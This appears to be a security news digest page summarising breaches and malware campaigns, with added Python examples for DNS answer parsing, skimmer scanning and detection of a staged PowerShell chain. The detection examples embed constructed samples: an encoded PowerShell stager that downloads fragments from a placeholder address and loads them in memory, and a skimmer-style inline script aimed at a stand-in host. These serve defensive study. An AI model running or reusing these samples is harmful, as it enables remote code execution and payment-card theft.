CISO Brief

All news in category “Incidents and Data Breaches”

2722 articles · page 64 of 137

CNAME and A Record Order Ambiguity Causes DNS Failures

⚠️ On January 8, 2026, a memory-optimizing change to Cloudflare’s 1.1.1.1 resolver inadvertently reordered DNS answer records, placing CNAMEs after final A/AAAA answers and triggering widespread resolution failures. The bug primarily affected clients that parse answers sequentially—most notably glibc getaddrinfo and certain Cisco switch firmware—resulting in failed lookups and reboot loops in some devices. Cloudflare reverted the change promptly and has drafted an IETF Internet‑Draft to clarify expected answer ordering.
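The ordering problem in concrete terms, as an added example that is not Cloudflare's or glibc's code: a single forward pass over the answer section, the style the item attributes to glibc getaddrinfo, beside an order-independent lookup and the canonical reordering a resolver can apply before sending. The records are constructed sample data (reserved example names and a TEST-NET address), not captured traffic.

```python
"""Why answer-record order matters, as an added example (not Cloudflare's or
glibc's code). Records are constructed: example names and a TEST-NET address."""
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    name: str    # owner name, fully qualified
    rtype: str   # "CNAME", "A" or "AAAA"
    rdata: str   # alias target or address


# www.example.com. -> cdn.example.net. -> 192.0.2.10, in resolution order
ANSWERS_IN_ORDER = [
    RR("www.example.com.", "CNAME", "cdn.example.net."),
    RR("cdn.example.net.", "A", "192.0.2.10"),
]
# The same records with the address record ahead of the CNAME that leads to it.
ANSWERS_REORDERED = list(reversed(ANSWERS_IN_ORDER))


def sequential_lookup(qname, answers):
    """One forward pass, following the current name as it goes.
    Records that precede the CNAME pointing at them are never revisited,
    so a chain emitted out of order yields no addresses."""
    target, addrs = qname, []
    for rr in answers:
        if rr.name != target:
            continue
        if rr.rtype == "CNAME":
            target = rr.rdata
        elif rr.rtype in ("A", "AAAA"):
            addrs.append(rr.rdata)
    return addrs


def _index(answers):
    by_name = {}
    for rr in answers:
        by_name.setdefault(rr.name, []).append(rr)
    return by_name


def order_independent_lookup(qname, answers, max_chain=8):
    """Index by owner name first, then walk the CNAME chain; wire order is irrelevant.
    A loop guard and a chain limit stop a malicious or broken response from spinning."""
    by_name, target, seen = _index(answers), qname, set()
    for _ in range(max_chain):
        if target in seen:
            return []
        seen.add(target)
        rrs = by_name.get(target, [])
        cnames = [rr for rr in rrs if rr.rtype == "CNAME"]
        if not cnames:
            return [rr.rdata for rr in rrs if rr.rtype in ("A", "AAAA")]
        target = cnames[0].rdata
    return []


def canonical_order(qname, answers):
    """Resolver-side fix: emit the chain in resolution order (each CNAME before the
    records for its target), then any records not on the chain, unchanged."""
    by_name, target, seen, ordered = _index(answers), qname, set(), []
    while target in by_name and target not in seen:
        seen.add(target)
        rrs = by_name[target]
        ordered.extend(rrs)
        cnames = [rr for rr in rrs if rr.rtype == "CNAME"]
        if not cnames:
            break
        target = cnames[0].rdata
    return ordered + [rr for rr in answers if rr not in ordered]


if __name__ == "__main__":
    q = "www.example.com."
    print("sequential, in order:  ", sequential_lookup(q, ANSWERS_IN_ORDER))
    print("sequential, reordered: ", sequential_lookup(q, ANSWERS_REORDERED))
    print("order-independent:     ", order_independent_lookup(q, ANSWERS_REORDERED))
    print("after canonical_order: ", sequential_lookup(q, canonical_order(q, ANSWERS_REORDERED)))
```

The sequential walk is not wrong by the letter of the protocol, which is why the fix landed on both sides: clients that index before they walk keep working whatever the resolver sends, and resolvers that emit the chain in resolution order keep the strict clients working.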

Charity-Themed Campaign Delivers PluggyApe to Ukraine

🔒 Between October and December 2025, Ukraine's Defense Forces were targeted in a charity-themed messaging campaign that delivered the PluggyApe backdoor. Attackers used Signal and WhatsApp to lure recipients to fake charity sites or to send password-protected archives containing PyInstaller-built executables with double extensions (.docx.pif), and sometimes delivered payloads directly through the messaging apps. PluggyApe profiles the host, sends victim identifiers and system data to its operators, persists through Windows Registry modifications, and retrieves base64-encoded C2 addresses from public paste services. CERT-UA attributes the activity with medium confidence to the Russia-aligned group Laundry Bear (aka Void Blizzard) and warns that delivery to mobile devices and from compromised local accounts makes such lures especially convincing.

Central Maine Healthcare breach exposes data of 145,381

🛡️ Central Maine Healthcare disclosed a security incident after discovering unauthorized access to its systems between March 19 and June 1, 2025. The investigation, completed on November 6, 2025, determined that 145,381 individuals, including patients and current or former employees, may have had sensitive information exposed. Exposed data types vary by person and can include full names, dates of birth, treatment and service details, provider names, health insurance information, and Social Security numbers. CMH has begun notifying affected individuals, is offering free credit monitoring, and has set up a dedicated patient support line to answer questions and accept reports of potential data misuse.

Belgian Hospital AZ Monica Shuts Down Servers Amid Outage

🔒 Belgian hospital AZ Monica disconnected all of its servers at 6:32 AM after a cyberattack that forced the cancellation of scheduled procedures and slowed emergency operations. The Emergency Department is operating at reduced capacity, the hospital's MUG (mobile emergency team) and PIT (paramedic intervention team) services are offline, and seven critical patients were transferred to other hospitals. The hospital has notified the authorities and is monitoring the situation while staff fall back on paper records; officials have not confirmed whether ransomware was involved.

NFCGate Relay Attacks: Evolving Mobile Payment Fraud

🔒 This article examines how NFC relay attacks built on the open-source NFCGate tool have been adapted by criminals to steal funds via smartphone payments. It describes both the original direct relay—where a victim’s phone reads their card and relays data to a mule—and the newer reverse relay that causes victims to unknowingly emulate an attacker’s card. The author outlines documented campaigns from 2023–2025, malware families involved, and practical precautions to reduce risk.

Long-running web skimming campaign targets major payments

🔒 Silent Push researchers disclosed a long-running web skimming campaign, active since January 2022, that targets customers of major payment networks including American Express, Mastercard, Discover, JCB, Diners Club and UnionPay. The attackers deliver heavily obfuscated JavaScript from the domain cdn-cookie[.]com to compromised e-commerce sites and check for the WordPress admin bar element (wpadminbar) so the skimmer self-destructs when an administrator is logged in. The skimmer renders a fake Stripe payment form, harvests card and personal data, exfiltrates it to lasorie[.]com, then erases its traces and sets a localStorage flag to prevent repeat infections of the same browser, heightening risk for enterprise clients of the affected payment providers.

Malicious Chrome Extension Steals MEXC API Keys in Web Store

⚠ A malicious Chrome extension named MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh) has been found on the Chrome Web Store and is designed to create and steal API keys for the MEXC exchange. Published Sept 1, 2025 by a developer using the handle "jorjortan142," the add-on programmatically generates API keys with withdrawal permissions and hides the enabled permission in the UI. The extension injects a content script on MEXC's API management page, captures the Access and Secret keys when created, and exfiltrates them via HTTPS to a hard-coded Telegram bot. Socket researcher Kirill Boychenko reported 29 downloads and warns the threat remains active as long as stolen keys are valid.

Betterment Confirms Data Breach After Crypto Scam Emails

🔒 Betterment confirmed a breach after an attacker used a third-party marketing platform to send fraudulent crypto reward emails to a subset of customers on January 9. The messages, sent from the legitimate subdomain address 'support@e.betterment.com', claimed to triple Bitcoin and Ethereum deposits and included wallet addresses and large deposit deadlines. The actor accessed customer contact data (names, emails, physical addresses, phone numbers, dates of birth) but did not access customer accounts or expose account credentials. Betterment removed the unauthorized access, warned customers, and said it will publish a post-mortem while strengthening defenses against social engineering.

SHADOW#REACTOR campaign uses text staging to deploy Remcos

🔎 A multi-stage Windows malware campaign, tracked as SHADOW#REACTOR, uses obfuscated VBS and heavily encoded PowerShell to stage payloads entirely in memory and avoid disk-based indicators. Attackers fetch repeated text-based fragments over HTTP, reconstruct them into a reflectively loaded .NET assembly protected with .NET Reactor, and abuse signed Microsoft binaries such as MSBuild.exe to execute the final Remcos RAT. The chain emphasizes living-off-the-land techniques, persistence and anti-analysis measures to complicate detection.

Convincing LinkedIn comment-reply phishing uses lnkd.in

⚠️ Scammers are targeting LinkedIn with fake comment replies that impersonate the platform and falsely warn users of policy violations or temporary account restrictions. The malicious replies sometimes use LinkedIn’s lnkd.in shortener or obscure .app domains to hide phishing destinations and present convincing link previews. Victims who click are directed to credential-harvesting pages that request identity verification. LinkedIn says it is aware and is taking action; members should report suspicious comments.

Ransomware Gangs Use Compliance Violations to Extort

⚠️ Recent analyses show ransomware groups increasingly threatening victims with reports of alleged regulatory breaches to authorities, adding a compliance layer to the familiar double-extortion model. Researchers at Akamai observed this tactic over the past two years, citing groups such as Anubis and RansomHub. Attackers target industries with high compliance exposure and use AI to rapidly identify violations and draft legally framed complaints under GDPR, DORA and tightened SEC rules.

Phishing Uses Browser-in-the-Browser to Steal Facebook

🔒 Cybercriminals are increasingly using browser-in-the-browser (BitB) attacks to harvest Facebook credentials, researchers at Trellix report. Attackers distribute phishing emails with spoofed, shortened links and present a fake in-browser pop-up that mimics the Facebook login — even hardcoding the real Facebook URL and displaying a bogus CAPTCHA to boost credibility. Victims are prompted for personal details and then asked to confirm their password; enabling two-factor authentication and avoiding embedded links can mitigate these scams.

Chinese Linux Malware Framework Targets Cloud and Containers

🔎 Check Point Research has identified a modular Linux malware framework, VoidLink, linked to Chinese-speaking developers and designed to target cloud and container environments. The framework includes custom loaders, implants, rootkits and over 30 plugins supporting reconnaissance, lateral movement, persistence and anti-forensic techniques. It detects AWS, GCP, Azure, Alibaba and Tencent and can enumerate containers, hypervisors and orchestration platforms. No live infections have been confirmed, but documentation suggests commercial intent and active development.

Target employees confirm leaked source code is authentic

🔒 Multiple current and former Target employees confirmed that source code and documentation shared by a threat actor match the company's internal systems. The leaked sample contains real system names (e.g., BigRED, TAP [Provisioning]), proprietary codenames and tooling references, including Vela-based CI/CD and JFrog Artifactory. Target enacted an "accelerated" change restricting access to its on-prem Git server to the corporate network and VPN after the disclosure.

Target employees confirm leaked code after Git lockdown

🔒 Multiple current and former Target employees told BleepingComputer that a sample of source code and documentation published by a threat actor matches real internal systems. A screenshot of company-wide Slack shows an "accelerated" security change effective January 9, 2026, restricting access to git.target.com to Target-managed networks or VPN. The 14MB sample contains internal names like "BigRED" and "TAP" and references to Vela, Hadoop datasets, and JFrog Artifactory. The threat actor claims a full archive of ~860GB; the root cause remains under investigation.

Global Magecart Campaign Targets Six Major Card Networks

🔒 Silent Push has uncovered a long-running Magecart web‑skimming campaign, active since around 2022, that loads highly obfuscated JavaScript from bulletproof hosting and targets six major card networks including American Express, Mastercard and UnionPay. The skimmer operates client-side, injecting an iframe to display a convincingly styled fake payment form that captures cardholder and shipping details before restoring the original form. Silent Push links parts of the infrastructure to domains hosted by a sanctioned/bulletproof provider and recommends measures such as Content Security Policy, PCI DSS adherence, timely CMS/plugin updates, enforced MFA and incognito-mode testing to detect stealthy injections.
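A first-pass check for the injection pattern described in this item and in the earlier Silent Push skimming item, as an added example that is not Silent Push's tooling: it parses a rendered checkout page, flags script sources whose host is not on the site's allowlist, and flags inline scripts that combine the tell-tales the reports describe (a WordPress admin-bar check, a localStorage marker, a dynamically built iframe or form, and a decode or eval call). The allowlist, the sample page and the hostnames in it are constructed; cdn-cookie.example and lasorie.example stand in for the report's defanged cdn-cookie[.]com and lasorie[.]com.

```python
"""First-pass scan of a checkout page for the injection patterns described above.
Added example, not Silent Push's tooling. The allowlist, the page and the
hostnames in it are constructed; cdn-cookie.example and lasorie.example stand in
for the report's defanged cdn-cookie[.]com and lasorie[.]com."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the shop's own origin plus its real payment provider's script host.
ALLOWED_SCRIPT_ORIGINS = {"shop.example", "js.stripe.com"}

# Tell-tales the reports describe. Any one alone is common in legitimate code;
# two or more in the same inline script is what gets flagged.
SUSPICIOUS = {
    "admin_bar_check": re.compile(r"wpadminbar", re.I),
    "local_storage_marker": re.compile(r"localStorage\.(setItem|getItem)"),
    "iframe_or_form_injection": re.compile(r"createElement\(\s*['\"](iframe|form)['\"]\s*\)", re.I),
    "decode_or_eval": re.compile(r"\b(atob|eval|unescape)\s*\(", re.I),
}


class ScriptCollector(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_inline = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data   # script bodies may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def scan_page(html, allowed=ALLOWED_SCRIPT_ORIGINS):
    """Return (finding_type, detail) pairs for a rendered checkout page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = (urlparse(src).hostname or "").lower()
        if host and host not in allowed:
            findings.append(("unlisted_script_origin", host))
    for body in parser.inline:
        hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(body))
        if len(hits) >= 2:
            findings.append(("inline_skimmer_pattern", ",".join(hits)))
    return findings


# Constructed page: one unlisted script host and one inline script that hides
# from the WordPress admin bar, marks the browser, and builds an iframe.
SAMPLE_CHECKOUT_PAGE = """<html><head>
<script src="https://shop.example/assets/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://cdn-cookie.example/cookie.js"></script>
</head><body>
<script>
  if (!document.getElementById('wpadminbar') && !localStorage.getItem('_sk')) {
    var f = document.createElement('iframe');
    f.src = atob('aHR0cHM6Ly8=') + 'lasorie.example/';
    document.forms[0].appendChild(f);
    localStorage.setItem('_sk', '1');
  }
</script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_CHECKOUT_PAGE):
        print(kind, detail)
```

This is a pre-filter, not a control. The measures the report recommends do the real work: a Content Security Policy `script-src` allowlist with reporting, so an injected third-party script is blocked or at least reported, and test fetches from a logged-out or incognito browser, since the skimmer stays dormant when the admin bar is present.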

BreachForums user database leaked, exposing 323,986 records

🔓 On January 9, 2026, a database containing 323,986 BreachForums user records was published on a site named after the ShinyHunters gang, exposing usernames, email addresses, password hashes and IP addresses. The leak was accompanied by a roughly 4,400‑word manifesto from someone calling themselves "James", who names alleged cybercriminals and claims responsibility. The provenance and motive remain unclear, though the dump could provide law enforcement with investigative leads and highlights the limits of perceived anonymity on criminal forums.

SHADOW#REACTOR Delivers Remcos RAT via Evasive Chain

🔍 Researchers described a newly observed SHADOW#REACTOR campaign that uses an evasive, multi-stage chain to deliver the commercial Remcos RAT and maintain covert persistence. An obfuscated win64.vbs launcher invokes a Base64 PowerShell stager that retrieves fragmented, text-only payloads and reconstructs loaders in memory using a .NET Reactor–protected reflective assembly. The final stage abuses MSBuild.exe to execute the Remcos backdoor, and wrapper scripts ensure re-execution, all designed to frustrate detection and analysis.
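Detection logic for the chain described in this item and in the earlier SHADOW#REACTOR item, as an added example that is not the researchers' own detection content: rules over process-creation events that decode a -EncodedCommand payload before matching, look for the stager's fetch-join-reflective-load shape, and tie PowerShell and MSBuild.exe back to the script host that spawned them. The events, file paths, stager text and the 198.51.100.7 address are constructed sample data in a Sysmon-like shape.

```python
"""Process-tree and encoded-command rules for the staged PowerShell chain.
Added example, not the researchers' detection content. Events are constructed
in a Sysmon-like shape; the stager text, paths and 198.51.100.7 are invented."""
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"} | POWERSHELL

# -EncodedCommand / -enc / -ec / -e followed by a base64 blob (UTF-16LE script).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Markers for the stages described: text fetched over HTTP, fragments joined
# back together, a reflectively loaded assembly, and a hidden/bypass launch.
STAGER_MARKERS = {
    "text_fetch": re.compile(r"\b(DownloadString|Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b", re.I),
    "fragment_reassembly": re.compile(r"-join\b", re.I),
    "reflective_assembly_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "hidden_or_bypass": re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass)", re.I),
}


def encode_command(script):
    """What -EncodedCommand expects: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded encoded-command payload, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def expand_cmdline(cmdline):
    """Swap the base64 blob for the decoded script (flag normalised to -enc),
    so the rules match on what will actually run rather than on base64 noise."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return cmdline
    return ENC_RE.sub(lambda m: "-enc " + decoded, cmdline, count=1)


def image_name(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (pid, image, [reasons]) for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        text = expand_cmdline(e["cmdline"]) if img in POWERSHELL else e["cmdline"]
        reasons = sorted(name for name, rx in STAGER_MARKERS.items() if rx.search(text))
        if img in POWERSHELL and pimg in {"wscript.exe", "cscript.exe"}:
            reasons.append("powershell_spawned_by_script_host")
        if img == "msbuild.exe" and pimg in SCRIPT_HOSTS:
            reasons.append("msbuild_spawned_by_script_host")
        if reasons:
            findings.append((e["pid"], img, reasons))
    return findings


# Constructed stager in the shape described: fetch text fragments, join them,
# decode to bytes and load the result as an assembly in memory.
STAGER = (
    "$parts = 1..3 | ForEach-Object { (New-Object Net.WebClient)"
    ".DownloadString(\"http://198.51.100.7/p$_.txt\") }; "
    "$bytes = [Convert]::FromBase64String(($parts -join '')); "
    "[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)"
)

# Constructed events: explorer -> wscript (VBS launcher) -> powershell (encoded
# stager) -> MSBuild, plus an ordinary interactive PowerShell for contrast.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\win64.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc " + encode_command(STAGER)},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.proj"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem"},
]

if __name__ == "__main__":
    for pid, img, reasons in detect(SAMPLE_EVENTS):
        print(pid, img, reasons)
```

Decoding before matching is the point: an encoded stager shows none of these strings on the command line, and a rule that only sees the base64 blob sees nothing. The parent-child rules carry the rest, since MSBuild.exe launched by a script host is rare outside build servers, and PowerShell launched by wscript.exe is rare anywhere.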

Iran Protests Trigger Nationwide Internet Shutdown

🌐 Cloudflare observed a near-total Internet blackout in Iran beginning on January 8, 2026, as national traffic fell to effectively zero in a matter of hours. Measured indicators included a 98.5% reduction in announced IPv6 address space and rapid losses at major providers such as MCCI, IranCell, and TCI. Brief, localized restorations — including access to Cloudflare’s 1.1.1.1 resolver and several university networks — were transient. Cloudflare continues to monitor the situation through Cloudflare Radar and will report updates.

Dutch Hacker Sentenced to Seven Years for Port Hacks

🔒 The Amsterdam Court of Appeal sentenced a 44‑year‑old Dutch national to seven years in prison for breaching IT systems at the ports of Rotterdam, Barendrecht and Antwerp to facilitate drug trafficking. The court found he gained access after employees plugged in USB sticks carrying malware, which enabled installation of a remote access tool, data exfiltration and interception of communications. An appeal arguing that the Sky ECC communications had been intercepted unlawfully was rejected, as the defence failed to substantiate any procedural violation. He was acquitted on one large cocaine import charge, but the convictions for hacking, facilitating the import of 210 kg of cocaine, and attempted extortion were upheld.